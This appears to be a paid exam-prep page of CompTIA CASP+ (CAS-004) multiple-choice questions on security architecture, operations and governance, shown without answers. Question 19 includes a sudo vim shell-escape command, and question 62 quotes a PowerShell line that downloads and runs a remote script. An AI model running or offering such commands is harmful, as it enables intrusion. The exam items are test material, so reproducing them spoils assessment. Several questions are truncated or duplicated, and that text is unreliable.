Winter Special Sale Limited Time 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 713PS592

CAS-004 CompTIA Advanced Security Practitioner (CASP+) Exam Questions and Answers

Questions 4

An organization is implementing a new identity and access management architecture with the following objectives:

Supporting MFA against on-premises infrastructure

Improving the user experience by integrating with SaaS applications

Applying risk-based policies based on location

Performing just-in-time provisioning

Which of the following authentication protocols should the organization implement to support these requirements?

Options:

A.

Kerberos and TACACS

B.

SAML and RADIUS

C.

OAuth and OpenID

D.

OTP and 802.1X

Buy Now
Questions 5

A university issues badges through a homegrown identity management system to all staff and students. Each week during the summer, temporary summer school students arrive and need to be issued a badge to access minimal campus resources. The security team received a report from an outside auditor indicating the homegrown system is not consistent with best practices in the security field and leaves the institution vulnerable.

Which of the following should the security team recommend FIRST?

Options:

A.

Investigating a potential threat identified in logs related to the identity management system

B.

Updating the identity management system to use discretionary access control

C.

Beginning research on two-factor authentication to later introduce into the identity management system

D.

Working with procurement and creating a requirements document to select a new IAM system/vendor

Buy Now
Questions 6

A company has hired a security architect to address several service outages on the endpoints due to new malware. The Chief Executive Officer’s laptop was impacted while working from home. The goal is to prevent further endpoint disruption. The edge network is protected by a web proxy.

Which of the following solutions should the security architect recommend?

Options:

A.

Replace the current antivirus with an EDR solution.

B.

Remove the web proxy and install a UTM appliance.

C.

Implement a deny list feature on the endpoints.

D.

Add a firewall module on the current antivirus solution.

Buy Now
Questions 7

All staff at a company have started working remotely due to a global pandemic. To transition to remote work, the company has migrated to SaaS collaboration tools. The human resources department wants to use these tools to process sensitive information but is concerned the data could be:

Leaked to the media via printing of the documents

Sent to a personal email address

Accessed and viewed by systems administrators

Uploaded to a file storage site

Which of the following would mitigate the department’s concerns?

Options:

A.

Data loss detection, reverse proxy, EDR, and PGP

B.

VDI, proxy, CASB, and DRM

C.

Watermarking, forward proxy, DLP, and MFA

D.

Proxy, secure VPN, endpoint encryption, and AV

Buy Now
Questions 8

A security engineer was auditing an organization’s current software development practice and discovered that multiple open-source libraries were Integrated into the organization’s software. The organization currently performs SAST and DAST on the software it develops.

Which of the following should the organization incorporate into the SDLC to ensure the security of the open-source libraries?

Options:

A.

Perform additional SAST/DAST on the open-source libraries.

B.

Implement the SDLC security guidelines.

C.

Track the library versions and monitor the CVE website for related vulnerabilities.

D.

Perform unit testing of the open-source libraries.

Buy Now
Questions 9

During a remodel, a company’s computer equipment was moved to a secure storage room with cameras positioned on both sides of the door. The door is locked using a card reader issued by the security team, and only the security team and department managers have access to the room. The company wants to be able to identify any unauthorized individuals who enter the storage room by following an authorized employee.

Which of the following processes would BEST satisfy this requirement?

Options:

A.

Monitor camera footage corresponding to a valid access request.

B.

Require both security and management to open the door.

C.

Require department managers to review denied-access requests.

D.

Issue new entry badges on a weekly basis.

Buy Now
Questions 10

A security architect is implementing a web application that uses a database back end. Prior to the production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks.

Which of the following sources could the architect consult to address this security concern?

Options:

A.

SDLC

B.

OVAL

C.

IEEE

D.

OWASP

Buy Now
Questions 11

An organization’s hunt team thinks a persistent threats exists and already has a foothold in the enterprise network.

Which of the following techniques would be BEST for the hunt team to use to entice the adversary to uncover malicious activity?

Options:

A.

Deploy a SOAR tool.

B.

Modify user password history and length requirements.

C.

Apply new isolation and segmentation schemes.

D.

Implement decoy files on adjacent hosts.

Buy Now
Questions 12

Which of the following allows computation and analysis of data within a ciphertext without knowledge of the plaintext?

Options:

A.

Lattice-based cryptography

B.

Quantum computing

C.

Asymmetric cryptography

D.

Homomorphic encryption

Buy Now
Questions 13

A company hired a third party to develop software as part of its strategy to be quicker to market. The company’s policy outlines the following requirements:

https://i.postimg.cc/8P9sB3zx/image.png

The credentials used to publish production software to the container registry should be stored in a secure location.

Access should be restricted to the pipeline service account, without the ability for the third-party developer to read the credentials directly.

Which of the following would be the BEST recommendation for storing and monitoring access to these shared credentials?

Options:

A.

TPM

B.

Local secure password file

C.

MFA

D.

Key vault

Buy Now
Questions 14

A business stores personal client data of individuals residing in the EU in order to process requests for mortgage loan approvals.

Which of the following does the business’s IT manager need to consider?

Options:

A.

The availability of personal data

B.

The right to personal data erasure

C.

The company’s annual revenue

D.

The language of the web application

Buy Now
Questions 15

After a security incident, a network security engineer discovers that a portion of the company’s sensitive external traffic has been redirected through a secondary ISP that is not normally used.

Which of the following would BEST secure the routes while allowing the network to function in the event of a single provider failure?

Options:

A.

Disable BGP and implement a single static route for each internal network.

B.

Implement a BGP route reflector.

C.

Implement an inbound BGP prefix list.

D.

Disable BGP and implement OSPF.

Buy Now
Questions 16

Device event logs sources from MDM software as follows:

CAS-004 Question 16

Which of the following security concerns and response actions would BEST address the risks posed by the device in the logs?

Options:

A.

Malicious installation of an application; change the MDM configuration to remove application ID 1220.

B.

Resource leak; recover the device for analysis and clean up the local storage.

C.

Impossible travel; disable the device’s account and access while investigating.

D.

Falsified status reporting; remotely wipe the device.

Buy Now
Questions 17

An enterprise is deploying APIs that utilize a private key and a public key to ensure the connection string is protected. To connect to the API, customers must use the private key.

Which of the following would BEST secure the REST API connection to the database while preventing the use of a hard-coded string in the request string?

Options:

A.

Implement a VPN for all APIs.

B.

Sign the key with DSA.

C.

Deploy MFA for the service accounts.

D.

Utilize HMAC for the keys.

Buy Now
Questions 18

An application server was recently upgraded to prefer TLS 1.3, and now users are unable to connect their clients to the server. Attempts to reproduce the error are confirmed, and clients are reporting the following:

ERR_SSL_VERSION_OR_CIPHER_MISMATCH

Which of the following is MOST likely the root cause?

Options:

A.

The client application is testing PFS.

B.

The client application is configured to use ECDHE.

C.

The client application is configured to use RC4.

D.

The client application is configured to use AES-256 in GCM.

Buy Now
Questions 19

During a system penetration test, a security engineer successfully gained access to a shell on a Linux host as a standard user and wants to elevate the privilege levels.

Which of the following is a valid Linux post-exploitation method to use to accomplish this goal?

Options:

A.

Spawn a shell using sudo and an escape string such as sudo vim -c ‘!sh’.

B.

Perform ASIC password cracking on the host.

C.

Read the /etc/passwd file to extract the usernames.

D.

Initiate unquoted service path exploits.

E.

Use the UNION operator to extract the database schema.

Buy Now
Questions 20

A company is preparing to deploy a global service.

Which of the following must the company do to ensure GDPR compliance? (Choose two.)

Options:

A.

Inform users regarding what data is stored.

B.

Provide opt-in/out for marketing messages.

C.

Provide data deletion capabilities.

D.

Provide optional data encryption.

E.

Grant data access to third parties.

F.

Provide alternative authentication techniques.

Buy Now
Questions 21

An organization is considering a BYOD standard to support remote working. The first iteration of the solution will utilize only approved collaboration applications and the ability to move corporate data between those applications. The security team has concerns about the following:

Unstructured data being exfiltrated after an employee leaves the organization

Data being exfiltrated as a result of compromised credentials

Sensitive information in emails being exfiltrated

Which of the following solutions should the security team implement to mitigate the risk of data loss?

Options:

A.

Mobile device management, remote wipe, and data loss detection

B.

Conditional access, DoH, and full disk encryption

C.

Mobile application management, MFA, and DRM

D.

Certificates, DLP, and geofencing

Buy Now
Questions 22

A small company recently developed prototype technology for a military program. The company’s security engineer is concerned about potential theft of the newly developed, proprietary information.

Which of the following should the security engineer do to BEST manage the threats proactively?

Options:

A.

Join an information-sharing community that is relevant to the company.

B.

Leverage the MITRE ATT&CK framework to map the TTR.

C.

Use OSINT techniques to evaluate and analyze the threats.

D.

Update security awareness training to address new threats, such as best practices for data security.

Buy Now
Questions 23

A security engineer thinks the development team has been hard-coding sensitive environment variables in its code.

Which of the following would BEST secure the company’s CI/CD pipeline?

Options:

A.

Utilizing a trusted secrets manager

B.

Performing DAST on a weekly basis

C.

Introducing the use of container orchestration

D.

Deploying instance tagging

Buy Now
Questions 24

Which of the following is the MOST important security objective when applying cryptography to control messages that tell an ICS how much electrical power to output?

Options:

A.

Importing the availability of messages

B.

Ensuring non-repudiation of messages

C.

Enforcing protocol conformance for messages

D.

Assuring the integrity of messages

Buy Now
Questions 25

A network architect is designing a new SD-WAN architecture to connect all local sites to a central hub site. The hub is then responsible for redirecting traffic to public cloud and datacenter applications. The SD-WAN routers are managed through a SaaS, and the same security policy is applied to staff whether working in the office or at a remote location. The main requirements are the following:

1. The network supports core applications that have 99.99% uptime.

2. Configuration updates to the SD-WAN routers can only be initiated from the management service.

3. Documents downloaded from websites must be scanned for malware.

Which of the following solutions should the network architect implement to meet the requirements?

Options:

A.

Reverse proxy, stateful firewalls, and VPNs at the local sites

B.

IDSs, WAFs, and forward proxy IDS

C.

DoS protection at the hub site, mutual certificate authentication, and cloud proxy

D.

IPSs at the hub, Layer 4 firewalls, and DLP

Buy Now
Questions 26

A security architect works for a manufacturing organization that has many different branch offices. The architect is looking for a way to reduce traffic and ensure the branch offices receive the latest copy of revoked certificates issued by the CA at the organization’s headquarters location. The solution must also have the lowest power requirement on the CA.

Which of the following is the BEST solution?

Options:

A.

Deploy an RA on each branch office.

B.

Use Delta CRLs at the branches.

C.

Configure clients to use OCSP.

D.

Send the new CRLs by using GPO.

Buy Now
Questions 27

A developer is creating a new mobile application for a company. The application uses REST API and TLS 1.2 to communicate securely with the external back-end server. Due to this configuration, the company is concerned about HTTPS interception attacks.

Which of the following would be the BEST solution against this type of attack?

Options:

A.

Cookies

B.

Wildcard certificates

C.

HSTS

D.

Certificate pinning

Buy Now
Questions 28

A security analyst is reviewing the following output:

CAS-004 Question 28

Which of the following would BEST mitigate this type of attack?

Options:

A.

Installing a network firewall

B.

Placing a WAF inline

C.

Implementing an IDS

D.

Deploying a honeypot

Buy Now
Questions 29

An organization is preparing to migrate its production environment systems from an on-premises environment to a cloud service. The lead security architect is concerned that the organization's current methods for addressing risk may not be possible in the cloud environment.

Which of the following BEST describes the reason why traditional methods of addressing risk may not be possible in the cloud?

Options:

A.

Migrating operations assumes the acceptance of all risk.

B.

Cloud providers are unable to avoid risk.

C.

Specific risks cannot be transferred to the cloud provider.

D.

Risks to data in the cloud cannot be mitigated.

Buy Now
Questions 30

Due to locality and budget constraints, an organization’s satellite office has a lower bandwidth allocation than other offices in the organization. As a result, the local security infrastructure staff is assessing architectural options that will help preserve network bandwidth and increase speed to both internal and external resources while not sacrificing threat visibility.

Which of the following would be the BEST option to implement?

Options:

A.

Distributed connection allocation

B.

Local caching

C.

Content delivery network

D.

SD-WAN vertical heterogeneity

Buy Now
Questions 31

A company publishes several APIs for customers and is required to use keys to segregate customer data sets.

Which of the following would be BEST to use to store customer keys?

Options:

A.

A trusted platform module

B.

A hardware security module

C.

A localized key store

D.

A public key infrastructure

Buy Now
Questions 32

A company has decided to purchase a license for software that is used to operate a mission-critical process. The third-party developer is new to the industry but is delivering what the company needs at this time.

Which of the following BEST describes the reason why utilizing a source code escrow will reduce the operational risk to the company if the third party stops supporting the application?

Options:

A.

The company will have access to the latest version to continue development.

B.

The company will be able to force the third-party developer to continue support.

C.

The company will be able to manage the third-party developer’s development process.

D.

The company will be paid by the third-party developer to hire a new development team.

Buy Now
Questions 33

Clients are reporting slowness when attempting to access a series of load-balanced APIs that do not require authentication. The servers that host the APIs are showing heavy CPU utilization. No alerts are found on the WAFs sitting in front of the APIs.

Which of the following should a security engineer recommend to BEST remedy the performance issues in a timely manner?

Options:

A.

Implement rate limiting on the API.

B.

Implement geoblocking on the WAF.

C.

Implement OAuth 2.0 on the API.

D.

Implement input validation on the API.

Buy Now
Questions 34

A security analyst is performing a vulnerability assessment on behalf of a client. The analyst must define what constitutes a risk to the organization.

Which of the following should be the analyst’s FIRST action?

Options:

A.

Create a full inventory of information and data assets.

B.

Ascertain the impact of an attack on the availability of crucial resources.

C.

Determine which security compliance standards should be followed.

D.

Perform a full system penetration test to determine the vulnerabilities.

Buy Now
Questions 35

A security analyst is investigating a possible buffer overflow attack. The following output was found on a user’s workstation:

graphic.linux_randomization.prg

Which of the following technologies would mitigate the manipulation of memory segments?

Options:

A.

NX bit

B.

ASLR

C.

DEP

D.

HSM

Buy Now
Questions 36

A pharmaceutical company recently experienced a security breach within its customer-facing web portal. The attackers performed a SQL injection attack and exported tables from the company’s managed database, exposing customer information.

The company hosts the application with a CSP utilizing the IaaS model. Which of the following parties is ultimately responsible for the breach?

Options:

A.

The pharmaceutical company

B.

The cloud software provider

C.

The web portal software vendor

D.

The database software vendor

Buy Now
Questions 37

A disaster recovery team learned of several mistakes that were made during the last disaster recovery parallel test. Computational resources ran out at 70% of restoration of critical services.

Which of the following should be modified to prevent the issue from reoccurring?

Options:

A.

Recovery point objective

B.

Recovery time objective

C.

Mission-essential functions

D.

Recovery service level

Buy Now
Questions 38

A security engineer estimates the company’s popular web application experiences 100 attempted breaches per day. In the past four years, the company’s data has been breached two times.

Which of the following should the engineer report as the ARO for successful breaches?

Options:

A.

0.5

B.

8

C.

50

D.

36,500

Buy Now
Questions 39

A new web server must comply with new secure-by-design principles and PCI DSS. This includes mitigating the risk of an on-path attack. A security analyst is reviewing the following web server configuration:

CAS-004 Question 39

Which of the following ciphers should the security analyst remove to support the business requirements?

Options:

A.

TLS_AES_128_CCM_8_SHA256

B.

TLS_DHE_DSS_WITH_RC4_128_SHA

C.

TLS_CHACHA20_POLY1305_SHA256

D.

TLS_AES_128_GCM_SHA256

Buy Now
Questions 40

An organization developed a social media application that is used by customers in multiple remote geographic locations around the world. The organization’s headquarters and only datacenter are located in New York City. The Chief Information Security Officer wants to ensure the following requirements are met for the social media application:

Low latency for all mobile users to improve the users’ experience

SSL offloading to improve web server performance

Protection against DoS and DDoS attacks

High availability

Which of the following should the organization implement to BEST ensure all requirements are met?

Options:

A.

A cache server farm in its datacenter

B.

A load-balanced group of reverse proxy servers with SSL acceleration

C.

A CDN with the origin set to its datacenter

D.

Dual gigabit-speed Internet connections with managed DDoS prevention

Buy Now
Questions 41

An architectural firm is working with its security team to ensure that any draft images that are leaked to the public can be traced back to a specific external party. Which of the following would BEST accomplish this goal?

Options:

A.

Properly configure a secure file transfer system to ensure file integrity.

B.

Have the external parties sign non-disclosure agreements before sending any images.

C.

Only share images with external parties that have worked with the firm previously.

D.

Utilize watermarks in the images that are specific to each external party.

Buy Now
Questions 42

An organization is deploying a new, online digital bank and needs to ensure availability and performance. The cloud-based architecture is deployed using PaaS and SaaS solutions, and it was designed with the following considerations:

- Protection from DoS attacks against its infrastructure and web applications is in place.

- Highly available and distributed DNS is implemented.

- Static content is cached in the CDN.

- A WAF is deployed inline and is in block mode.

- Multiple public clouds are utilized in an active-passive architecture.

With the above controls in place, the bank is experiencing a slowdown on the unauthenticated payments page. Which of the following is the MOST likely cause?

Options:

A.

The public cloud provider is applying QoS to the inbound customer traffic.

B.

The API gateway endpoints are being directly targeted.

C.

The site is experiencing a brute-force credential attack.

D.

A DDoS attack is targeted at the CDN.

Buy Now
Questions 43

An attacker infiltrated the code base of a hardware manufacturer and inserted malware before the code was compiled. The malicious code is now running at the hardware level across a number of industries and sectors. Which of the following categories BEST describes this type of vendor risk?

Options:

A.

SDLC attack

B.

Side-load attack

C.

Remote code signing

D.

Supply chain attack

Buy Now
Questions 44

A security analyst is investigating a series of suspicious emails by employees to the security team. The email appear to come from a current business partner and do not contain images or URLs. No images or URLs were stripped from the message by the security tools the company uses instead, the emails only include the following in plain text.

CAS-004 Question 44

Which of the following should the security analyst perform?

Options:

A.

Contact the security department at the business partner and alert them to the email event.

B.

Block the IP address for the business partner at the perimeter firewall.

C.

Pull the devices of the affected employees from the network in case they are infected with a zero-day virus.

D.

Configure the email gateway to automatically quarantine all messages originating from the business partner.

Buy Now
Questions 45

A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests:

CAS-004 Question 45

Which of the following would BEST mitigate this vulnerability?

Options:

A.

Network intrusion prevention

B.

Data encoding

C.

Input validation

D.

CAPTCHA

Buy Now
Questions 46

A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.

Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?

Options:

A.

NAC to control authorized endpoints

B.

FIM on the servers storing the data

C.

A jump box in the screened subnet

D.

A general VPN solution to the primary network

Buy Now
Questions 47

A bank is working with a security architect to find the BEST solution to detect database management system compromises. The solution should meet the following requirements:

♦ Work at the application layer

♦ Send alerts on attacks from both privileged and malicious users

♦ Have a very low false positive

Which of the following should the architect recommend?

Options:

A.

FIM

B.

WAF

C.

NIPS

D.

DAM

E.

UTM

Buy Now
Questions 48

An organization's finance system was recently attacked. A forensic analyst is reviewing the contents Of the compromised files for credit card data.

Which of the following commands should the analyst run to BEST determine whether financial data was lost?

CAS-004 Question 48

Options:

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Buy Now
Questions 49

A security administrator configured the account policies per security implementation guidelines. However, the accounts still appear to be susceptible to brute-force attacks. The following settings meet the existing compliance guidelines:

Must have a minimum of 15 characters

Must use one number

Must use one capital letter

Must not be one of the last 12 passwords used

Which of the following policies should be added to provide additional security?

Options:

A.

Shared accounts

B.

Password complexity

C.

Account lockout

D.

Password history

E.

Time-based logins

Buy Now
Questions 50

A security engineer needs 10 implement a CASB to secure employee user web traffic. A Key requirement is mat relevant event data must be collected from existing on-premises infrastructure components and consumed by me CASB to expand traffic visibility. The solution must be nighty resilient to network outages. Which of the following architectural components would BEST meet these requirements?

Options:

A.

Log collection

B.

Reverse proxy

C.

AWAF

D.

API mode

Buy Now
Questions 51

A host on a company’s network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis.

Which of the following steps would be best to perform FIRST?

Options:

A.

Turn off the infected host immediately.

B.

Run a full anti-malware scan on the infected host.

C.

Modify the smb.conf file of the host to prevent outgoing SMB connections.

D.

Isolate the infected host from the network by removing all network connections.

Buy Now
Questions 52

Technicians have determined that the current server hardware is outdated, so they have decided to throw it out.

Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered?

Options:

A.

Drive wiping

B.

Degaussing

C.

Purging

D.

Physical destruction

Buy Now
Questions 53

A security analyst wants to keep track of alt outbound web connections from workstations. The analyst's company uses an on-premises web filtering solution that forwards the outbound traffic to a perimeter firewall. When the security analyst gets the connection events from the firewall, the source IP of the outbound web traffic is the translated IP of the web filtering solution. Considering this scenario involving source NAT. which of the following would be the BEST option to inject in the HTTP header to include the real source IP from workstations?

Options:

A.

X-Forwarded-Proto

B.

X-Forwarded-For

C.

Cache-Control

D.

Strict-Transport-Security

E.

Content-Security-Policy

Buy Now
Questions 54

A security analyst is trying to identify the source of a recent data loss incident. The analyst has reviewed all the for the time surrounding the identified all the assets on the network at the time of the data loss. The analyst suspects the key to finding the source was obfuscated in an application. Which of the following tools should the analyst use NEXT?

Options:

A.

Software Decomplier

B.

Network enurrerator

C.

Log reduction and analysis tool

D.

Static code analysis

Buy Now
Questions 55

A Chief information Security Officer (CISO) has launched to create a rebuts BCP/DR plan for the entire company. As part of the initiative , the security team must gather data supporting s operational importance for the applications used by the business and determine the order in which the application must be back online. Which of the following be the FIRST step taken by the team?

Options:

A.

Perform a review of all policies an procedures related to BGP a and DR and created an educated educational module that can be assigned to at employees to provide training on BCP/DR events.

B.

Create an SLA for each application that states when the application will come back online and distribute this information to the business units.

C.

Have each business unit conduct a BIA and categories the application according to the cumulative data gathered.

D.

Implement replication of all servers and application data to back up detacenters that are geographically from the central datacenter and release an upload BPA to all clients.

Buy Now
Questions 56

Which of the following technologies allows CSPs to add encryption across multiple data storages?

Options:

A.

Symmetric encryption

B.

Homomorphic encryption

C.

Data dispersion

D.

Bit splitting

Buy Now
Questions 57

A security analyst is reviewing the following vulnerability assessment report:

CAS-004 Question 57

Which of the following should be patched FIRST to minimize attacks against Internet-facing hosts?

Options:

A.

Server1

B.

Server2

C.

Server 3

D.

Servers

Buy Now
Questions 58

A large telecommunications equipment manufacturer needs to evaluate the strengths of security controls in a new telephone network supporting first responders. Which of the following techniques would the company use to evaluate data confidentiality controls?

Options:

A.

Eavesdropping

B.

On-path

C.

Cryptanalysis

D.

Code signing

E.

RF sidelobe sniffing

Buy Now
Questions 59

An HVAC contractor requested network connectivity permission to remotely support/troubleshoot equipment issues at a company location. Currently, the company does not have a process that allows vendors remote access to the corporate network Which of the following solutions represents the BEST course of action to allow the contractor access?

Options:

A.

Add the vendor's equipment to the existing network Give the vendor access through the standard corporate VPN

B.

Give the vendor a standard desktop PC to attach the equipment to Give the vendor access through the standard corporate VPN

C.

Establish a certification process for the vendor Allow certified vendors access to the VDI to monitor and maintain the HVAC equipment

D.

Create a dedicated segment with no access to the corporate network Implement dedicated VPN hardware for vendor access

Buy Now
Questions 60

A company in the financial sector receives a substantial number of customer transaction requests via email. While doing a root-cause analysis conceding a security breach, the CIRT correlates an unusual spike in port 80 traffic from the IP address of a desktop used by a customer relations employee who has access to several of the compromised accounts. Subsequent antivirus scans of the device do not return an findings, but the CIRT finds undocumented services running on the device. Which of the following controls would reduce the discovery time for similar in the future.

Options:

A.

Implementing application blacklisting

B.

Configuring the mall to quarantine incoming attachment automatically

C.

Deploying host-based firewalls and shipping the logs to the SIEM

D.

Increasing the cadence for antivirus DAT updates to twice daily

Buy Now
Questions 61

A security architect for a large, multinational manufacturer needs to design and implement a security solution to monitor traffic.

When designing the solution, which of the following threats should the security architect focus on to prevent attacks against the ОТ network?

Options:

A.

Packets that are the wrong size or length

B.

Use of any non-DNP3 communication on a DNP3 port

C.

Multiple solicited responses over time

D.

Application of an unsupported encryption algorithm

Buy Now
Questions 62

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl ');whois

Which of the following security controls would have alerted and prevented the next phase of the attack?

Options:

A.

Antivirus and UEBA

B.

Reverse proxy and sandbox

C.

EDR and application approved list

D.

Forward proxy and MFA

Buy Now
Questions 63

The goal of a Chief information Security Officer (CISO) providing up-to-date metrics to a bank’s risk committee is to ensure:

Options:

A.

Budgeting for cybersecurity increases year over year.

B.

The committee knows how much work is being done.

C.

Business units are responsible for their own mitigation.

D.

The bank is aware of the status of cybersecurity risks

Buy Now
Questions 64

An analyst received a list of IOCs from a government agency. The attack has the following characteristics:

1. The attack starts with bulk phishing.

2. If a user clicks on the link, a dropper is downloaded to the computer.

3. Each of the malware samples has unique hashes tied to the user.

The analyst needs to identify whether existing endpoint controls are effective. Which of the following risk mitigation techniques should the analyst use?

Options:

A.

Update the incident response plan.

B.

Blocklist the executable.

C.

Deploy a honeypot onto the laptops.

D.

Detonate in a sandbox.

Buy Now
Questions 65

An administrator at a software development company would like to protect the integrity Of the company's applications with digital signatures. The developers report that the signing process keeps failing on all applications. The same key pair used for signing, however, is working properly on the website, is valid, and is issued by a trusted CA. Which of the following is MOST likely the cause of the signature failing?

Options:

A.

The NTP server is set incorrectly for the developers.

B.

The CA has included the certificate in its CRL_

C.

The certificate is set for the wrong key usage.

D.

Each application is missing a SAN or wildcard entry on the certificate.

Buy Now
Questions 66

A healthcare system recently suffered from a ransomware incident As a result the board of directors decided to hire a security consultant to improve existing network security. The security consultant found that the healthcare network was completely flat, had no privileged access limits and had open RDP access to servers with personal health information. As the consultant builds the remediation plan, which of the following solutions would BEST solve these challenges? (Select THREE).

Options:

A.

SD-WAN

B.

PAM

C.

Remote access VPN

D.

MFA

E.

Network segmentation

F.

BGP

G.

NAC

Buy Now
Questions 67

Due to adverse events, a medium-sized corporation suffered a major operational disruption that caused its servers to crash and experience a major power outage. Which of the following should be created to prevent this type of issue in the future?

Options:

A.

SLA

B.

BIA

C.

BCM

D.

BCP

E.

RTO

Buy Now
Questions 68

A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes.

Which of the following should a security architect recommend?

Options:

A.

A DLP program to identify which files have customer data and delete them

B.

An ERP program to identify which processes need to be tracked

C.

A CMDB to report on systems that are not configured to security baselines

D.

A CRM application to consolidate the data and provision access based on the process and need

Buy Now
Questions 69

A software development company makes Its software version available to customers from a web portal. On several occasions, hackers were able to access the software repository to change the package that is automatically published on the website. Which of the following would be the BEST technique to ensure the software the users download is the official software released by the company?

Options:

A.

Distribute the software via a third-party repository.

B.

Close the web repository and deliver the software via email.

C.

Email the software link to all customers.

D.

Display the SHA checksum on the website.

Buy Now
Questions 70

An auditor needs to scan documents at rest for sensitive text. These documents contain both text and Images. Which of the following software functionalities must be enabled in the DLP solution for the auditor to be able to fully read these documents? (Select TWO).

Options:

A.

Document interpolation

B.

Regular expression pattern matching

C.

Optical character recognition functionality

D.

Baseline image matching

E.

Advanced rasterization

F.

Watermarking

Buy Now
Questions 71

A security analyst is validating the MAC policy on a set of Android devices. The policy was written to ensure non-critical applications are unable to access certain resources. When reviewing dmesg, the analyst notes many entries such as:

Despite the deny message, this action was still permit following is the MOST likely fix for this issue?

Options:

A.

Add the objects of concern to the default context.

B.

Set the devices to enforcing

C.

Create separate domain and context files for irc.

D.

Rebuild the policy, reinstall, and test.

Buy Now
Questions 72

A company’s Chief Information Security Officer is concerned that the company’s proposed move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC.

Which of the following compensating controls would be BEST to implement in this situation?

Options:

A.

EDR

B.

SIEM

C.

HIDS

D.

UEBA

Buy Now
Questions 73

A company wants to quantify and communicate the effectiveness of its security controls but must establish measures. Which of the following is MOST likely to be included in an effective assessment roadmap for these controls?

Options:

A.

Create a change management process.

B.

Establish key performance indicators.

C.

Create an integrated master schedule.

D.

Develop a communication plan.

E.

Perform a security control assessment.

Buy Now
Questions 74

A company just released a new video card. Due to limited supply and high demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems. Which of the following now describes the level of risk?

Options:

A.

Inherent

B.

Low

C.

Mitigated

D.

Residual.

E.

Transferred

Buy Now
Questions 75

A security is assisting the marketing department with ensuring the security of the organization’s social media platforms. The two main concerns are:

The Chief marketing officer (CMO) email is being used department wide as the username

The password has been shared within the department

Which of the following controls would be BEST for the analyst to recommend?

Options:

A.

Configure MFA for all users to decrease their reliance on other authentication.

B.

Have periodic, scheduled reviews to determine which OAuth configuration are set for each media platform.

C.

Create multiple social media accounts for all marketing user to separate their actions.

D.

Ensue the password being shared is sufficiently and not written down anywhere.

Buy Now
Questions 76

A company just released a new video card. Due to limited supply and nigh demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's Intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems. Which of the following now describes the level of risk?

Options:

A.

Inherent

Low

B.

Mitigated

C.

Residual

D.

Transferred

Buy Now
Questions 77

A security analyst received a report that a suspicious flash drive was picked up in the office's waiting area, located beyond the secured door. The analyst investigated the drive and found malware designed to harvest and transmit credentials. Security cameras in the area where the flash drive was discovered showed a vendor representative dropping the drive. Which of the following should the analyst recommend as an additional way to identify anyone who enters the building, in the event the camera system fails?

Options:

A.

Employee badge logs

B.

Phone call logs

C.

Vehicle registration logs

D.

Visitor logs

Buy Now
Questions 78

A company has retained the services of a consultant to perform a security assessment. As part of the assessment the consultant recommends engaging with others in the industry to collaborate in regards to emerging attacks Which of the following would best enable this activity?

Options:

A.

ISAC

B.

OSINT

C.

CVSS

D.

Threat modeling

Buy Now
Questions 79

A security analyst identified a vulnerable and deprecated runtime engine that is supporting a public-facing banking application. The developers anticipate the transition to modern development environments will take at least a month. Which of the following controls would best mitigate the risk without interrupting the service during the transition?

Options:

A.

Shutting down the systems until the code is ready

B.

Uninstalling the impacted runtime engine

C.

Selectively blocking traffic on the affected port

D.

Configuring IPS and WAF with signatures

Buy Now
Questions 80

An internal security assessor identified large gaps in a company's IT asset inventory system during a monthly asset review. The assessor is aware of an external audit that is underway. In an effort to avoid external findings, the assessor chooses not to report the gaps in the inventory system. Which of the following legal considerations is the assessor directly violating?

Options:

A.

Due care

B.

Due diligence

C.

Due process

D.

Due notice

Buy Now
Questions 81

A software development company wants to ensure that users can confirm the software is legitimate when installing it. Which of the following is the best way for the company to achieve this security objective?

Options:

A.

Code signing

B.

Non-repudiation

C.

Key escrow

D.

Private keys

Buy Now
Questions 82

A regulated company is in the process of refreshing its entire infrastructure. The company has a business-critical process running on an old 2008 Windows server. If this server fails, the company would lose millions of dollars in revenue. Which of the following actions should the company take?

Options:

A.

Accept the risk as the cost of doing business.

B.

Create an organizational risk register for project prioritization.

C.

Implement network compensating controls.

D.

Purchase insurance to offset the cost if a failure occurred.

Buy Now
Questions 83

An organization is researching the automation capabilities for systems within an OT network. A security analyst wants to assist with creating secure coding practices and would like to learn about the programming languages used on the PLCs. Which of the following programming languages is the MOST relevant for PLCs?

Options:

A.

Ladder logic

B.

Rust

C.

C

D.

Python

E.

Java

Buy Now
Questions 84

An organization has deployed a cloud-based application that provides virtual event services globally to clients. During a typical event, thousands of users access various entry pages within a short period of time. The entry pages include sponsor-related content that is relatively static and is pulled from a database. When the first major event occurs, users report poor response time on the entry pages. Which of the following features is the most appropriate for the company to implement?

Options:

A.

Horizontal scalability

B.

Vertical scalability

C.

Containerization

D.

Static code analysis

E.

Caching

Buy Now
Questions 85

When managing and mitigating SaaS cloud vendor risk, which of the following responsibilities belongs to the client?

Options:

A.

Data

B.

Storage

C.

Physical security

D.

Network

Buy Now
Questions 86

A systems engineer needs to develop a solution that uses digital certificates to allow authentication to laptops. Which of the following authenticator types would be most appropriate for the engineer to include in the design?

Options:

A.

TOTP token

B.

Device certificate

C.

Smart card

D.

Biometric

Buy Now
Questions 87

A company is experiencing a large number of attempted network-based attacks against its online store. To determine the best course of action, a security analyst reviews the following logs.

